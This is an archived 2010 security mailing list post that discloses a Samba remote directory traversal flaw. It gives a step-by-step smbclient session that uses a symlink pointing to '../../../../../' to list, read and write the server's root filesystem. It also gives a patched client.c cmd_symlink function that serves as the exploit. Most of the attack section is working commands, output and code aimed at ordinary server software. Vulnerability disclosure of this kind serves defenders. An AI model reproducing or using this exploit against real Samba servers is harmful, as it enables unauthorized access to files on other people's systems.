lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <1265385862.2392.12.camel@nr-pentest>
Date: Fri, 05 Feb 2010 17:04:22 +0100
From: Kingcope <kcope2@...glemail.com>
To: full-disclosure@...ts.grok.org.uk
Cc: bugtraq@...urityfocus.com
Subject: Re: Samba Remote Zero-Day Exploit

Samba Remote Directory Traversal
logic fuckup discovered & exploited by Kingcope in 2010

It seems there was a quite similar bug found back in 2004:
http://marc.info/?l=bugtraq&m=109658688505723&w=2

A remote attacker can read, list and retrieve nearly all files on the System remotely.
Required is a valid samba account for a share which is writeable OR
a writeable share which is configured to be a guest account share,
in this case this is a preauth exploit.

The attacker can write for example into /tmp or where the account
he is connecting with has access to (/home/<user> etc).

Exploit session (using the patched smbclient exploit):

smb is a samba user created.

root@...pentest:~/Downloads/samba-3.4.5/source3# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -Usmb //<host>/testmount/
Enter smb's password: 
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]
smb: \> ls
  .                                   D        0  Wed Feb  3 14:27:03 2010
  ..                                  D        0  Wed Feb  3 14:19:13 2010
  test                                D        0  Wed Feb  3 14:19:13 2010
  xxx                                 A     1955  Wed Feb  3 14:22:42 2010

		45503 blocks of size 2097152. 24437 blocks available
smb: \> symlink ../../../../../ foobar
smb: \> ls
  .                                   D        0  Wed Feb  3 14:27:47 2010
  ..                                  D        0  Wed Feb  3 14:19:13 2010
  xxx                                 A     1955  Wed Feb  3 14:22:42 2010
  foobar                              D        0  Mon Feb  1 20:29:12 2010

		45503 blocks of size 2097152. 24437 blocks available
smb: \> ls ..
NT_STATUS_OBJECT_PATH_SYNTAX_BAD listing \..

		45503 blocks of size 2097152. 24437 blocks available
smb: \> cd foobar
smb: \foobar\> ls
  .                                   D        0  Mon Feb  1 20:29:12 2010
  ..                                  D        0  Mon Feb  1 20:29:12 2010
  initrd.img.old                         7646184  Mon Jan 18 13:15:48 2010
  boot.ini                                 18832  Mon Feb  1 20:29:12 2010
  home                                D        0  Mon Jan 18 13:08:24 2010
  initrd.img                             8007195  Thu Jan 21 21:51:26 2010
  .cache                             DH        0  Sat Jan 23 14:19:08 2010
  opt                                 D        0  Sat Jan 30 11:39:59 2010
  lib                                 D        0  Thu Jan 21 21:13:01 2010
  usr                                 D        0  Sun Jan 31 22:08:11 2010
  .libs                              DH        0  Thu Jan 21 12:30:48 2010
  var                                 D        0  Sun Jan 31 21:14:42 2010
  bin                                 D        0  Mon Jan 18 13:31:14 2010
  selinux                             D        0  Tue Oct 20 01:05:22 2009
  root                                D        0  Tue Feb  2 19:43:59 2010
  vmlinuz.old                            3890400  Fri Oct 16 20:03:49 2009
  vmlinuz                                3890560  Thu Dec 10 20:33:26 2009
  etc                                 D        0  Wed Feb  3 14:17:29 2010
  srv                                 D        0  Sat Jan 23 20:17:29 2010
  proc                               DR        0  Wed Feb  3 14:10:41 2010
  dev                                 D        0  Wed Feb  3 14:11:02 2010
  boot                                D        0  Thu Jan 21 21:51:26 2010
  mnt                                 D        0  Sat Jan 23 19:26:23 2010
  media                               D        0  Fri Jan 29 08:32:31 2010
  cdrom                               D        0  Mon Jan 18 12:40:11 2010
  tmp                                 D        0  Wed Feb  3 14:26:20 2010
  sbin                                D        0  Thu Jan 21 21:50:58 2010
  lost+found                          D        0  Mon Jan 18 12:39:57 2010
  sys                                 D        0  Wed Feb  3 14:10:41 2010

		45503 blocks of size 2097152. 24437 blocks available
smb: \foobar\> 

put and get works in the folder now!

list open shares, this is normal operation mode not an exploit:

root@...pentest:~/Downloads/samba-3.4.5/source3/client# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -L //<host>/
Enter root's password: 
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]

	Sharename       Type      Comment
	---------       ----      -------
	testmount       Disk      							// < this share is writable and exploitable!!
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (nr-pentest server (Samba, Ubuntu))
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]

	Server               Comment
	---------            -------
	NR-PENTEST           nr-pentest server (Samba, Ubuntu)

	Workgroup            Master
	---------            -------
	WORKGROUP            NR-PENTEST


smbclient patch (exploit):

samba-3.4.5/source3/client/client.c
/****************************************************************************
 UNIX symlink.
****************************************************************************/

static int cmd_symlink(void)
{
        TALLOC_CTX *ctx = talloc_tos();
        char *oldname = NULL;
        char *newname = NULL;
        char *buf = NULL;
        char *buf2 = NULL;
        char *targetname = NULL;
        struct cli_state *targetcli;

        if (!next_token_talloc(ctx, &cmd_ptr,&buf,NULL) ||
            !next_token_talloc(ctx, &cmd_ptr,&buf2,NULL)) {
                d_printf("symlink <oldname> <newname>\n");
                return 1;
        }
        oldname = talloc_asprintf(ctx,			
                        "%s",				// << HERE modified
                        buf);				
        if (!oldname) {
                return 1;
        }
        newname = talloc_asprintf(ctx,
                        "%s",				// << HERE modified
                        buf2);
        if (!newname) {
                return 1;
        }
/* ORIGINAL SMBCLIENT SOURCE LINES TO BE MODIFIED (SEE ABOVE).
      oldname = talloc_asprintf(ctx,
                        "%s%s",				// < modified (see above)
                        client_get_cur_dir(),		// < removed (see above)
                        buf);
        if (!oldname) {
                return 1;
        }
        newname = talloc_asprintf(ctx,
                        "%s%s",				// < modified (see above)
                        client_get_cur_dir(),		// < removed (see above)
                        buf2);
        if (!newname) {
                return 1;
        }
----------------------------------------------*/

        if (!cli_resolve_path(ctx, "", auth_info, cli, oldname, &targetcli, &targetname)) {
                d_printf("link %s: %s\n", oldname, cli_errstr(cli));
                return 1;

        }

        if (!SERVER_HAS_UNIX_CIFS(targetcli)) {
                d_printf("Server doesn't support UNIX CIFS calls.\n");
                return 1;
        }

        if (!cli_unix_symlink(targetcli, targetname, newname)) {
                d_printf("%s symlinking files (%s -> %s)\n",
                        cli_errstr(targetcli), newname, targetname);
                return 1;
        }

        return 0;
}


// Cheers,
// kcope

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ